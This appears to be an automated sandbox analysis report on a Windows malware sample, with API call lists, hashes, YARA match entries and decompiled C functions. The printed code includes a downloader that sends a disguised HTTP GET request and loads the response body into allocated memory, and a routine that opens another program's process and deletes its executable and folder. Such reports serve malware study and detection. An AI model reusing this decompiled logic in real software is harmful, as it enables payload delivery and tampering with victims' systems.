                            0x00406e31
                            0x00406e34
                            0x00406e34
                            0x00406e36
                            0x00406e39
                            0x00406e3b
                            0x00406e47
                            0x00406e4b
                            0x00406e56
                            0x00406e58
                            0x00406e5a
                            0x00406e5c
                            0x00406e5e
                            0x00406e5e
                            0x00406e5e
                            0x00406e5c
                            0x00406e51
                            0x00406e51
                            0x00406e51
                            0x00406e64
                            0x00406e6d
                            0x00406e70
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406e64
                            0x00000000
                            0x00406e6b
                            0x00406e73
                            0x00406e73
                            0x00406e85
                            0x00406e8a
                            0x00406e8e
                            0x00406e92
                            0x00406e9d
                            0x00406ea0
                            0x00406eb0
                            0x00406eb4
                            0x00406eb5
                            0x00406eb7
                            0x00406ece
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: LdrLoadDll$ntdll.dll
                            • API String ID: 0-2564759627
                            • Opcode ID: 26199cb8ddb39cfad843a8b26eb0063365d615b1915ceb47f07636977a66487d
                            • Instruction ID: 0121abc35d73cd05cb0d05474da0aa42d564b0e020fccb72fa3831c3f1767a3f
                            • Opcode Fuzzy Hash: 26199cb8ddb39cfad843a8b26eb0063365d615b1915ceb47f07636977a66487d
                            • Instruction Fuzzy Hash: 5221097A900318ABCB20DF54CC44BCAB3B8EF05310F1145BBE442B72C1D738AA528F99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 006743CC
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 2236af22a45584ce20d6dce83dc1bdfde52e0fb1420d8add2f05910be02f2cee
                            • Instruction ID: a8e9fd06a87e8a03cc0ffe297444913d48bd9bbf8338531b082c0a0554d1495d
                            • Opcode Fuzzy Hash: 2236af22a45584ce20d6dce83dc1bdfde52e0fb1420d8add2f05910be02f2cee
                            • Instruction Fuzzy Hash: 7D31A4329403196AEF21DA61CC4AFEE776EAB44700F1440A9BA5CE65D2DF709E808B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00671758
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0067178C
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000,0000000E,?,00000000,0000000C), ref: 00672905
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$ContextRelease
                            • String ID:
                            • API String ID: 1374739491-0
                            • Opcode ID: 25e946fca50f19ba1329ffb1d3c3208f1283f46c6d723c2b59f9f9b584dc330a
                            • Instruction ID: ea604a0d99e4a413a9e391fd72ad5221095e3a7072d2fdbf05dd1e4ffc51618c
                            • Opcode Fuzzy Hash: 25e946fca50f19ba1329ffb1d3c3208f1283f46c6d723c2b59f9f9b584dc330a
                            • Instruction Fuzzy Hash: 16212171D44208AADF61ABF0CC0ABDD76BAEF09704F60C099F50CB5181CB7A9E549F29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00406A32(signed int __eax, signed int _a4) {
                            				signed int _t8;
                            				void* _t13;
                            				signed int _t15;
                            
                            				asm("rdtsc");
                            				_push(_t13);
                            				_push(_t15);
                            				asm("rcr eax, 0x10");
                            				_t8 = 0x3cfb5543 + __eax * 0x1e7319 + _t13;
                            				if(_t15 != 0) {
                            					_t8 = _t8 * _t15;
                            				}
                            				return _t8 * _a4 >> 0x20;
                            			}






                            0x00406a32
                            0x00406a38
                            0x00406a39
                            0x00406a47
                            0x00406a4a
                            0x00406a4e
                            0x00406a50
                            0x00406a50
                            0x00406a60

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: orvsmwx
                            • API String ID: 0-3620674537
                            • Opcode ID: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
                            • Instruction ID: e20836bcb2183fd6e4bc37302a764bbc3301637dd8970ebb8ab0e0739f3880af
                            • Opcode Fuzzy Hash: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
                            • Instruction Fuzzy Hash: 20D05B7B7041062BB70C904FAD078A7665FC1D2364318D437F501D4295F551DA450074
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4d22340c16e90843450b287e841b6e9c91b496de2465bcebbb5643a28184e08
                            • Instruction ID: 9c23a00ca2d77476be830bb55308d4bf8d12c03846474f55ae76d27d4d44849a
                            • Opcode Fuzzy Hash: c4d22340c16e90843450b287e841b6e9c91b496de2465bcebbb5643a28184e08
                            • Instruction Fuzzy Hash: 4521F6B6908218AFCB20DF64CC40FCDB7BAEF06310F14C5DAE559A3241D334AA868F65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                            • Instruction ID: 67b50d6cdb13576357ce01fc2bf86b95e8a12a14f6060b42d624fe98c00f9c5b
                            • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                            • Instruction Fuzzy Hash: 7CF0AF76A00604DFEB21CFA4C805BEE73BAEF84315F1481A5D80AD7245D330A9428B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00412C3A
                            • SleepEx.KERNEL32(00000000,00000000), ref: 00412C42
                            • SetSystemTimeAdjustment.KERNEL32(00000000,00000000), ref: 00412C7A
                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?), ref: 00412CA2
                            • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00412CAB
                            • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00412CC9
                            • GetTapeParameters.KERNEL32(00000000,00000000,?,?), ref: 00412CEE
                            • GetTapeStatus.KERNEL32(00000000), ref: 00412CF5
                            • SetTapeParameters.KERNEL32(00000000,00000000,00000000), ref: 00412CFE
                            • WriteTapemark.KERNEL32(00000000,00000000,00000000,00000000), ref: 00412D08
                            • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 00412D0F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: Tape$ParametersStatus$AdjustmentCommCompletionConfigCreateDefaultDeleteMountMutexObjectPointPostQueuedSingleSleepSystemTapemarkTimeVolumeWaitWrite
                            • String ID:
                            • API String ID: 3740700622-3916222277
                            • Opcode ID: 58f5d767bfbc9a25883ef4e1ee60c6680286b8df8e6a18555e805fe0609adca4
                            • Instruction ID: effeb91f464e61448a5f8e6ab60bc9e60fa6e9a9060f80dc0d2cc37ccf301f48
                            • Opcode Fuzzy Hash: 58f5d767bfbc9a25883ef4e1ee60c6680286b8df8e6a18555e805fe0609adca4
                            • Instruction Fuzzy Hash: 49511D71902118EFDB10CFAADD489DFBFB8EF89355B108035E209E7250D7749A45CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00405DB5(void* __eflags, struct HWND__* _a4) {
                            				char _v16;
                            				char _v260;
                            				char _v516;
                            				long _v520;
                            				char _v648;
                            				char* _v652;
                            				intOrPtr _v656;
                            				void* _v660;
                            				void* _v664;
                            				int _t35;
                            				void* _t38;
                            				void* _t47;
                            				CHAR* _t48;
                            				int _t50;
                            				void* _t57;
                            				void* _t58;
                            				void* _t60;
                            
                            				E004066D2( &_v664,  &_v16 - _t60);
                            				GetWindowThreadProcessId(_a4,  &_v520);
                            				if(_v520 != GetCurrentProcessId()) {
                            					GetClassNameA(_a4,  &_v260, 0x100);
                            					_t35 = GetWindowTextA(_a4,  &_v516, 0x100);
                            					_t63 = _t35;
                            					if(_t35 != 0) {
                            						_t38 = E00406926(_t63, "win32app",  &_v260);
                            						_t64 = _t38;
                            						if(_t38 != 0 && E00406926(_t64, "Microsoft",  &_v516) != 0) {
                            							_t57 = 0x80;
                            							do {
                            								_t40 = E00406A32(_t40, 0x80);
                            								asm("stosb");
                            								_t57 = _t57 - 1;
                            							} while (_t57 != 0);
                            							_v660 = E00406A32(_t40, 0xee6b2800);
                            							_v656 = E00406A32(_t41, 0x80) + 1;
                            							_v652 =  &_v648;
                            							SendMessageA(_a4, 0x4a, 0,  &_v660);
                            							_t47 = OpenProcess(0x410, 0, _v520);
                            							if(_t47 != 0) {
                            								_v664 = _t47;
                            								_push(0x100);
                            								_t48 =  &_v260;
                            								_push(_t48);
                            								_push(0);
                            								_push(_v664);
                            								L00407214();
                            								if(_t48 != 0) {
                            									Sleep(0x3e8);
                            									_t50 = DeleteFileA( &_v260);
                            									_t69 = _t50;
                            									if(_t50 != 0) {
                            										_t58 = E0040690B(_t69,  &_v260);
                            										while(1) {
                            											_t58 = _t58 - 1;
                            											if(_t58 == 0) {
                            												goto L13;
                            											}
                            											if( *[ss:ecx+ebp-0x100] != 0x5c) {
                            												continue;
                            											} else {
                            												 *[ss:ecx+ebp-0x100] = 0;
                            												RemoveDirectoryA( &_v260);
                            											}
                            											goto L13;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				L13:
                            				return 1;
                            			}




















                            0x00405dcc
                            0x00405ddb
                            0x00405deb
                            0x00405e00
                            0x00405e14
                            0x00405e19
                            0x00405e1b
                            0x00405e2d
                            0x00405e32
                            0x00405e34
                            0x00405e59
                            0x00405e5e
                            0x00405e63
                            0x00405e68
                            0x00405e69
                            0x00405e69
                            0x00405e76
                            0x00405e87
                            0x00405e93
                            0x00405ea7
                            0x00405eb9
                            0x00405ec0
                            0x00405ec2
                            0x00405ec8
                            0x00405ecd
                            0x00405ed3
                            0x00405ed4
                            0x00405ed6
                            0x00405edc
                            0x00405ee3
                            0x00405eea
                            0x00405ef6
                            0x00405efb
                            0x00405efd
                            0x00405f0b
                            0x00405f0d
                            0x00405f0d
                            0x00405f0e
                            0x00000000
                            0x00000000
                            0x00405f19
                            0x00000000
                            0x00405f1b
                            0x00405f1b
                            0x00405f2b
                            0x00405f2b
                            0x00000000
                            0x00405f19
                            0x00405f0d
                            0x00405efd
                            0x00405ee3
                            0x00405ec0
                            0x00405e34
                            0x00405e1b
                            0x00405f30
                            0x00405f39

                            APIs
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00405DDB
                            • GetCurrentProcessId.KERNEL32(?,?), ref: 00405DE0
                            • GetClassNameA.USER32(?,?,00000100), ref: 00405E00
                            • GetWindowTextA.USER32 ref: 00405E14
                            • SendMessageA.USER32 ref: 00405EA7
                            • OpenProcess.KERNEL32(00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?,?), ref: 00405EB9
                            • GetModuleFileNameExA.PSAPI(?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?), ref: 00405EDC
                            • Sleep.KERNEL32(000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft), ref: 00405EEA
                            • DeleteFileA.KERNEL32(?,000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080), ref: 00405EF6
                            • RemoveDirectoryA.KERNEL32(00000000), ref: 00405F2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$FileNameWindow$ClassCurrentDeleteDirectoryMessageModuleOpenRemoveSendSleepTextThread
                            • String ID: Microsoft$win32app
                            • API String ID: 934796723-2644191155
                            • Opcode ID: 766082f414c41e68ca2501deaea97d83371bab73ddcfb4c1a5012634102fb8f0
                            • Instruction ID: 1cbef3aabf6f1d8fd4f8c9e77f2fd98a24b0206eb3abaf6762db6ad26ae4f9ce
                            • Opcode Fuzzy Hash: 766082f414c41e68ca2501deaea97d83371bab73ddcfb4c1a5012634102fb8f0
                            • Instruction Fuzzy Hash: 2E318471A102196AEB21AA61CC46FEB776CEB14304F4040BBB644F51C1EFB89E858F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ioctlsocket.WS2_32(?,8004667E,00000001), ref: 00674E2F
                            • connect.WS2_32(?,00000002,00000010), ref: 00674E4B
                            • connect.WS2_32(?,00000017,0000001C), ref: 00674E5B
                            • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00674E86
                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00674EA9
                            • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00674EEC
                            • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00674FA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: connectioctlsocketselect$Ioctl
                            • String ID: `
                            • API String ID: 2054606664-1850852036
                            • Opcode ID: 60eeeceaeafabe558cf777d0f0e4b2f0a43e0808ebe5ec19b7639d7fdc3063aa
                            • Instruction ID: ff709e26bdab810ab989def9f9fe54077d99b6b191fdc7e4a159d1b798d99bdc
                            • Opcode Fuzzy Hash: 60eeeceaeafabe558cf777d0f0e4b2f0a43e0808ebe5ec19b7639d7fdc3063aa
                            • Instruction Fuzzy Hash: 93D16071940708BAEF21DBE0CC46FEEBBBDAF08700F108459F659B6191DB71AA44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00402D52(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				void* _v24;
                            				char _v48;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				long _v68;
                            				char _v72;
                            				char _v76;
                            				char _v84;
                            				char _v96;
                            				char _v100;
                            				intOrPtr _v104;
                            				intOrPtr _v108;
                            				char _v112;
                            				char _v116;
                            				char _v1140;
                            				char _v1144;
                            				long _v1148;
                            				void* _t86;
                            				void* _t100;
                            				char* _t120;
                            				void* _t130;
                            				long _t137;
                            				signed int _t139;
                            				char _t140;
                            				intOrPtr* _t141;
                            				void* _t142;
                            
                            				_t139 = __edx;
                            				E004066D2( &_v1148,  &_v16 - _t142);
                            				E004048E1(_a16);
                            				L004071F6();
                            				E0040685B(_a4,  &_v1140);
                            				_t86 = E00401168(_t139,  &_v1140, _a8,  &_v12,  &_v20,  &_v100,  &_v24,  &_v48,  &_v56,  &_v60);
                            				_t145 = _t86;
                            				if(_t86 == 0) {
                            					L8:
                            					E00406517( &_v56,  &_v56, 0, 2);
                            					E004064D6( &_v48,  &_v48, 0, 6);
                            					__eflags = _v24;
                            					if(_v24 != 0) {
                            						_push(0);
                            						_push(_v24);
                            						 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            					}
                            					E00406474( &_v12,  &_v20, _v100);
                            					E004048E1( &_v64);
                            					__eflags = _v1148;
                            					if(_v1148 == 0) {
                            						L18:
                            						E0040664B( &_v1144, _a16, 4);
                            						return _v1148;
                            					} else {
                            						_t141 = _v1144;
                            						_t137 = _v1148;
                            						while(1) {
                            							__eflags = _t137 - 4;
                            							if(_t137 < 4) {
                            								goto L18;
                            							}
                            							__eflags =  *_t141 - 0xa0d0a0d;
                            							if( *_t141 != 0xa0d0a0d) {
                            								L16:
                            								_t141 = _t141 + 1;
                            								_t137 = _t137 - 1;
                            								__eflags = _t137;
                            								continue;
                            							}
                            							_t137 = _t137 - 4;
                            							_t141 = _t141 + 4;
                            							__eflags = _t137;
                            							if(_t137 <= 0) {
                            								goto L16;
                            							}
                            							_v1148 = _t137;
                            							_t100 = VirtualAlloc(0, _v1148, 0x3000, 4);
                            							__eflags = _t100;
                            							if(_t100 != 0) {
                            								_t140 = _t100;
                            								E0040664B(_t141, _t140, _v1148);
                            								E004048E1( &_v1144);
                            								_v1144 = _t140;
                            							}
                            							goto L18;
                            						}
                            						goto L18;
                            					}
                            				}
                            				_v72 = 2;
                            				_v68 = 4;
                            				_v112 = 1;
                            				_v108 = 0x2710;
                            				_v104 = 0x2710;
                            				_push(0);
                            				_push(0);
                            				_push( &_v116);
                            				_push(0);
                            				_push(0);
                            				_push(0xc);
                            				_push( &_v112);
                            				_push(0x98000004);
                            				_push(_v100);
                            				L004071A2();
                            				E0040419A(_t145, _v100,  &_v12, 0,  &_v1140, wsprintfA( &_v1140, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), _v24,  &_v48,  &_v56, 2,  &_v72, _v60);
                            				while(1) {
                            					E00406698(_v100, 0,  &_v96, 0xa, 0);
                            					_push( &_v84);
                            					_push(0);
                            					_push(0);
                            					_t120 =  &_v96;
                            					_push(_t120);
                            					_push(0);
                            					L0040717E();
                            					if(_t120 <= 0) {
                            						goto L8;
                            					}
                            					if(_t120 == 0) {
                            						L7:
                            						continue;
                            					}
                            					_t130 = E004042C8(_v100,  &_v12,  &_v64, _v24,  &_v48,  &_v56,  &_v68,  &_v72,  &_v76, _v60, 0);
                            					if(_t130 == 0) {
                            						goto L8;
                            					}
                            					if(_t130 < 0) {
                            						continue;
                            					}
                            					_v1148 = _v1148 + _t130;
                            					E00404842( &_v1144, _v1148, _v64, _t130);
                            					E004048E1( &_v64);
                            					goto L7;
                            				}
                            				goto L8;
                            			}

































                            0x00402d52
                            0x00402d69
                            0x00402d71
                            0x00402d76
                            0x00402d85
                            0x00402db0
                            0x00402db5
                            0x00402db7
                            0x00402ed1
                            0x00402ed9
                            0x00402ee6
                            0x00402eeb
                            0x00402eef
                            0x00402ef1
                            0x00402ef3
                            0x00402f0b
                            0x00402f0b
                            0x00402f18
                            0x00402f21
                            0x00402f26
                            0x00402f2d
                            0x00402f98
                            0x00402fa4
                            0x00402fb3
                            0x00402f2f
                            0x00402f2f
                            0x00402f35
                            0x00402f93
                            0x00402f93
                            0x00402f96
                            0x00000000
                            0x00000000
                            0x00402f3d
                            0x00402f43
                            0x00402f91
                            0x00402f91
                            0x00402f92
                            0x00402f92
                            0x00000000
                            0x00402f92
                            0x00402f45
                            0x00402f48
                            0x00402f4b
                            0x00402f4e
                            0x00000000
                            0x00000000
                            0x00402f50
                            0x00402f6a
                            0x00402f6a
                            0x00402f6c
                            0x00402f6e
                            0x00402f78
                            0x00402f84
                            0x00402f89
                            0x00402f89
                            0x00000000
                            0x00402f6c
                            0x00000000
                            0x00402f93
                            0x00402f2d
                            0x00402dbd
                            0x00402dc4
                            0x00402dcb
                            0x00402dd2
                            0x00402dd9
                            0x00402de0
                            0x00402de2
                            0x00402de7
                            0x00402de8
                            0x00402dea
                            0x00402dec
                            0x00402df1
                            0x00402df2
                            0x00402df7
                            0x00402dfa
                            0x00402e3e
                            0x00402e43
                            0x00402e50
                            0x00402e58
                            0x00402e59
                            0x00402e5b
                            0x00402e5d
                            0x00402e60
                            0x00402e61
                            0x00402e63
                            0x00402e6b
                            0x00000000
                            0x00000000
                            0x00402e6f
                            0x00402ecc
                            0x00000000
                            0x00402ecc
                            0x00402e9d
                            0x00402e9f
                            0x00000000
                            0x00000000
                            0x00402ea4
                            0x00000000
                            0x00000000
                            0x00402eac
                            0x00402ebe
                            0x00402ec7
                            0x00000000
                            0x00402ec7
                            0x00000000

                            APIs
                              • Part of subcall function 004048E1: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00405802,?,?,?,?,?,?,00000000,00000006), ref: 004048F8
                            • InitSecurityInterfaceA.SECUR32(?,?,?,?,?,?), ref: 00402D76
                              • Part of subcall function 00401168: CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider,0000000D,F0000000,?,?,?,?,?), ref: 00401196
                            • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00402DFA
                            • wsprintfA.USER32 ref: 00402E25
                              • Part of subcall function 0040419A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00000003), ref: 004041C1
                              • Part of subcall function 0040419A: SetEvent.KERNEL32(?,?,?,00000202,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004042BC
                            • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,0000000A,00000000,?,?,00000000,?,00000000), ref: 00402E63
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,00000000,00000006,?,00000000,00000002,?,?), ref: 00402F65
                            Strings
                            • BCryptCloseAlgorithmProvider, xrefs: 00402F00
                            • GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00402E19
                            • bcrypt.dll, xrefs: 00402EF6
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AcquireAllocContextCryptEventFreeInitInterfaceIoctlObjectSecuritySingleWaitselectwsprintf
                            • String ID: BCryptCloseAlgorithmProvider$GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close$bcrypt.dll
                            • API String ID: 2317253078-3296554225
                            • Opcode ID: b141543811ac2fdb499663156c98a7eba23e1efa0c185121b3bf43e13e6cfc9e
                            • Instruction ID: 5172cb2c25526707d216cc97dd3cd0b60c6fea09f2dad06a88325455df19caa3
                            • Opcode Fuzzy Hash: b141543811ac2fdb499663156c98a7eba23e1efa0c185121b3bf43e13e6cfc9e
                            • Instruction Fuzzy Hash: 39714BB2D4021DBAEF11EAE0CD49FEE777CEB04304F10046AB609F60C1D779AA548B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E00402765(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
                            				char _v8;
                            				char _v16;
                            				char _v28;
                            				intOrPtr _v40;
                            				short _v42;
                            				char _v44;
                            				char _v300;
                            				char _v304;
                            				char _v308;
                            				char _t34;
                            				char* _t44;
                            				short _t46;
                            				char* _t52;
                            				void* _t57;
                            				void* _t58;
                            
                            				_t58 = __eflags;
                            				_t34 = E004066D2( &_v308,  &_v16 - _t57);
                            				_push(6);
                            				_push(1);
                            				_push(2);
                            				L00407196();
                            				_v8 = _t34;
                            				E0040664B( &_v8, _a4, 4);
                            				_v304 = 1;
                            				_push(4);
                            				_push( &_v304);
                            				_push(1);
                            				_push(6);
                            				_push(_v8);
                            				L0040718A();
                            				E004066E9(_a8, 0xffffffff,  &_v300);
                            				if(E004065E4(_t58,  &_v300) == 0) {
                            					_t44 = E00406558(__eflags,  &_v300, 2);
                            					_push(_t44);
                            					L0040716C();
                            				} else {
                            					_t44 =  &_v300;
                            				}
                            				_push(_t44);
                            				L00407166();
                            				if(_t44 != 0) {
                            					_v40 = _t44;
                            					_t46 = _a12;
                            					if(_t46 > 0x10000) {
                            						_t46 = E00406663(_t46);
                            					}
                            					_push(_t46);
                            					L00407160();
                            					_v42 = _t46;
                            					_v44 = 2;
                            					_v304 = 1;
                            					_push( &_v304);
                            					_push(0x8004667e);
                            					_push(_v8);
                            					L00407172();
                            					_push(0x10);
                            					_push( &_v44);
                            					_push(_v8);
                            					L0040715A();
                            					E00406698(_v8, 0,  &_v28, _a16, 0);
                            					_push( &_v16);
                            					_push(0);
                            					_t52 =  &_v28;
                            					_push(_t52);
                            					_push(0);
                            					_push(0);
                            					L0040717E();
                            					if(_t52 == 1) {
                            						_v304 = 0;
                            						_push( &_v304);
                            						_push(0x8004667e);
                            						_push(_v8);
                            						L00407172();
                            						_v308 = 1;
                            					}
                            				}
                            				return _v308;
                            			}


















                            0x00402765
                            0x0040277c
                            0x00402781
                            0x00402783
                            0x00402785
                            0x00402787
                            0x0040278c
                            0x00402798
                            0x0040279d
                            0x004027a7
                            0x004027af
                            0x004027b0
                            0x004027b2
                            0x004027b4
                            0x004027b7
                            0x004027c8
                            0x004027db
                            0x004027ee
                            0x004027f3
                            0x004027f4
                            0x004027dd
                            0x004027dd
                            0x004027dd
                            0x004027f9
                            0x004027fa
                            0x00402801
                            0x00402807
                            0x0040280a
                            0x00402812
                            0x00402815
                            0x00402815
                            0x0040281a
                            0x0040281b
                            0x00402820
                            0x00402824
                            0x0040282a
                            0x0040283a
                            0x0040283b
                            0x00402840
                            0x00402843
                            0x00402848
                            0x0040284d
                            0x0040284e
                            0x00402851
                            0x00402864
                            0x0040286c
                            0x0040286d
                            0x0040286f
                            0x00402872
                            0x00402873
                            0x00402875
                            0x00402877
                            0x0040287f
                            0x00402881
                            0x00402891
                            0x00402892
                            0x00402897
                            0x0040289a
                            0x0040289f
                            0x0040289f
                            0x0040287f
                            0x004028b3

                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 00402787
                            • setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027B7
                            • inet_ntoa.WSOCK32(00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002), ref: 004027F4
                            • inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 004027FA
                            • htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 0040281B
                            • ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402843
                            • connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 00402851
                            • select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 00402877
                            • ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 0040289A
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ioctlsocket$connecthtonsinet_addrinet_ntoaselectsetsockoptsocket
                            • String ID:
                            • API String ID: 983927830-0
                            • Opcode ID: 0c17bba96f937ce885c5b7511bcf90411d8c1719d1bacf2ff94e2e5573756d33
                            • Instruction ID: a2fbdf31c0014d020e322edf825d3b0370b6f4014994f73e4852958e84d483f6
                            • Opcode Fuzzy Hash: 0c17bba96f937ce885c5b7511bcf90411d8c1719d1bacf2ff94e2e5573756d33
